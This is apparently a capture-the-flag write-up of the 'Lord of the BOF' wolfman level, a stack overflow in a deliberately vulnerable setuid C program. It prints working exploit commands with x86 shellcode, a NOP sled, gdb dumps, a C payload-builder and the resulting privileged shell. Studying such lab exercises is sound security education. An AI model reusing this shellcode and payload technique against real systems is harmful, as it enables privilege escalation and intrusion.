LOB orc => wolfman
Problem
[orc@localhost orc]$ cat wolfman.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[orc@localhost orc]$
The source is the same as the previous level, orc (the egghunter that wipes the environment strings and the argv[1][47] == 0xbf check), except that this time buffer is also zeroed after it has been used. That blocks the usual route of pointing the return address at shellcode stored in buffer.
Vulnerability
        char buffer[40];
        /* egghunter and the argv[1][47] check omitted; see the full source above */

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
The argument is copied in with strcpy(), which imposes no length limit, so an argument longer than the 40-byte buffer overwrites the memory beyond it, up to and including the saved return address. The memset that follows only clears the 40 bytes of buffer itself; it does not touch what the overflow wrote above buffer, and it does not touch the copy of the argument that still sits in argv[1].
Solution
(gdb) b*main
Breakpoint 1 at 0x8048500
(gdb) r `python -c "print 'A'*47 + '\xbf'"`
Starting program: /home/orc/tmp/wolfman `python -c "print 'A'*47 + '\xbf'"`
Breakpoint 1, 0x8048500 in main ()
(gdb) x/100x $ebp-500
0xbffff904: 0x00000000 0x40013a08 0x40013a00 0x400139d8
--- omitted ---
(gdb)
0xbffffc24: 0x6d666c6f 0x41006e61 0x41414141 0x41414141
0xbffffc34: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc44: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc54: 0x41414141 0x00bf4141 0x5353454c 0x4e45504f
0xbffffc64: 0x752f7c3d 0x622f7273 0x6c2f6e69 0x70737365
0xbffffc74: 0x2e657069 0x25206873 0x53550073 0x414e5245
0xbffffc84: 0x003d454d 0x54534948 0x455a4953 0x3030313d
0xbffffc94: 0x4f480030 0x414e5453 0x6c3d454d 0x6c61636f
0xbffffca4: 0x74736f68 0x636f6c2e 0x6f646c61 0x6e69616d
0xbffffcb4: 0x474f4c00 0x454d414e 0x63726f3d 0x4d455200
0xbffffcc4: 0x4845544f 0x3d54534f 0x2e323931 0x2e383631
0xbffffcd4: 0x2e333931 0x414d0031 0x2f3d4c49 0x2f726176
0xbffffce4: 0x6f6f7073 0x616d2f6c 0x6f2f6c69 0x4d006372
0xbffffcf4: 0x54484341 0x3d455059 0x36383369 0x6465722d
0xbffffd04: 0x2d746168 0x756e696c 0x6e672d78 0x45540075
0xbffffd14: 0x783d4d52 0x6d726574 0x534f4800 0x50595454
0xbffffd24: 0x33693d45 0x50003638 0x3d485441 0x7273752f
0xbffffd34: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962
0xbffffd44: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72
0xbffffd54: 0x2f365231 0x3a6e6962 0x6d6f682f 0x726f2f65
0xbffffd64: 0x69622f63 0x4c4f006e 0x44575044 0x6f682f3d
0xbffffd74: 0x6f2f656d 0x48006372 0x3d454d4f 0x6d6f682f
0xbffffd84: 0x726f2f65 0x4e490063 0x52545550 0x652f3d43
0xbffffd94: 0x692f6374 0x7475706e 0x53006372 0x4c4c4548
0xbffffda4: 0x69622f3d 0x61622f6e 0x55006873 0x3d524553
This time the input lands in argv[1] first and is only then copied into buffer, so instead of sending the return address back into buffer (which the buffer hunter wipes), the shellcode is appended right after the overwritten return address inside argv[1] and the return address is pointed at that spot. The target address, which is both where the shellcode will sit and the value written over the return address, is taken as 0xbffffc5a: the last of the 44 'A's (0xbffffc56 in the dump above) plus 4. Two caveats are visible in the dump itself. argv[1] starts at 0xbffffc2b, so 0xbffffc5a is argv[1][47], the 0xbf byte of the return address, and the first shellcode byte actually sits one further on, at 0xbffffc5b. And the argv strings lie directly below the environment strings near the top of the stack, so argv[1] moves when the payload grows or when the program runs outside gdb with a different environment.
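As an added example (not part of the original write-up), the argv[1] layout just described as a small C model: it builds 'A'*44 + return address + NOP sled + shellcode using the page's 25-byte shellcode, checks the argv[1][47] == 0xbf gate, and reports which part of the payload a guessed return address points into when argv[1] starts at a given base. The base 0xbffffc2b is read from the page's gdb dump; the lower base used in main() is an assumed value standing in for a shifted stack, and the region names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD      44      /* bytes before the return address: buffer + saved ebp */
#define RET_LEN  4

/* The page's 25-byte execve("/bin//sh") shellcode. */
static const unsigned char SHELLCODE[] = {
    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3,0x50,0x53,0x89,0xe1,0x89,0xc2,0xb0,0x0b,0xcd,0x80
};
#define SC_LEN (sizeof SHELLCODE)

/* Total payload length for a given sled size (without the trailing NUL). */
size_t payload_len(size_t nops) { return PAD + RET_LEN + nops + SC_LEN; }

/* Builds 'A'*44 + ret (little-endian) + 0x90*nops + shellcode into out.
 * Returns the length written (without the NUL) or -1 if out is too small. */
int build_payload(unsigned char *out, size_t cap, uint32_t ret, size_t nops)
{
    size_t len = payload_len(nops);
    if (len + 1 > cap) return -1;
    memset(out, 'A', PAD);
    for (int k = 0; k < RET_LEN; k++)
        out[PAD + k] = (unsigned char)(ret >> (8 * k));
    memset(out + PAD + RET_LEN, 0x90, nops);
    memcpy(out + PAD + RET_LEN + nops, SHELLCODE, SC_LEN);
    out[len] = '\0';
    return (int)len;
}

/* wolfman's gate: argv[1][47] must be 0xbf, i.e. the top byte of the
 * return address must make it look like a stack address. */
int payload_passes_gate(uint32_t ret, size_t nops)
{
    unsigned char buf[512];
    int len = build_payload(buf, sizeof buf, ret, nops);
    return len > 47 && buf[47] == 0xbf;
}

/* Which part of the payload a return-address guess points into, assuming
 * argv[1] starts at `base` in memory. */
enum region { OUTSIDE, PADDING, RET_BYTES, SLED, SHELLCODE_BODY };

enum region hit_region(uint32_t base, size_t nops, uint32_t guess)
{
    if (guess < base) return OUTSIDE;
    uint32_t off = guess - base;
    if (off < PAD)                             return PADDING;
    if (off < PAD + RET_LEN)                   return RET_BYTES;
    if (off < PAD + RET_LEN + nops)            return SLED;
    if (off < PAD + RET_LEN + nops + SC_LEN)   return SHELLCODE_BODY;
    return OUTSIDE;
}

/* 1 if execution starting at `guess` runs the shellcode from its first byte:
 * anywhere in the sled slides into it, and the exact shellcode start works
 * too. Any other spot decodes other bytes first and is not what the exploit
 * intends. */
int execution_lands(uint32_t base, size_t nops, uint32_t guess)
{
    enum region r = hit_region(base, nops, guess);
    return r == SLED || (r == SHELLCODE_BODY && guess == base + PAD + RET_LEN + nops);
}

int main(void)
{
    unsigned char buf[512];
    int len = build_payload(buf, sizeof buf, 0xbffffc5au, 100);
    printf("payload: %d bytes, argv[1][47] = 0x%02x\n", len, buf[47]);
    /* argv[1] at 0xbffffc2b, as in the page's gdb dump, no sled */
    printf("0xbffffc5a -> region %d, lands %d\n",
           hit_region(0xbffffc2bu, 0, 0xbffffc5au), execution_lands(0xbffffc2bu, 0, 0xbffffc5au));
    printf("0xbffffc5b -> region %d, lands %d\n",
           hit_region(0xbffffc2bu, 0, 0xbffffc5bu), execution_lands(0xbffffc2bu, 0, 0xbffffc5bu));
    /* assumed shifted base, 100-byte sled: the same guess now lands in the sled */
    printf("base 0xbffffbf0, 0xbffffc52 -> lands %d\n",
           execution_lands(0xbffffbf0u, 100, 0xbffffc52u));
    return 0;
}
```

Against the base from the gdb dump, 0xbffffc5a hits the last byte of the return address and 0xbffffc5b the shellcode start. With a 100-byte sled the acceptable window is 101 bytes wide, which is what lets an approximate guess succeed once the real base has shifted.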
[orc@localhost tmp]$ ./wolfman `python -c "print 'A'*44 + '\x5a\xfc\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZ<non-printable address and shellcode bytes>
Segmentation fault (core dumped)
Huh? But it threw a segmentation fault. Let's analyze the core file.
[orc@localhost tmp]$ gdb -c core
[orc@localhost tmp]$ ./wolfman `python -c "print 'A'*44 + '\x52\xfc\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR<non-printable address and shellcode bytes>
Illegal instruction (core dumped)
Hmm...? It errors out.... Just in case, I wedged in some NOPs, and then the shell popped properly.
[orc@localhost orc]$ ./wolfman `python -c "print 'A'*44 + '\x52\xfc\xff\xbf' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR<non-printable address bytes, NOP sled and shellcode>
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$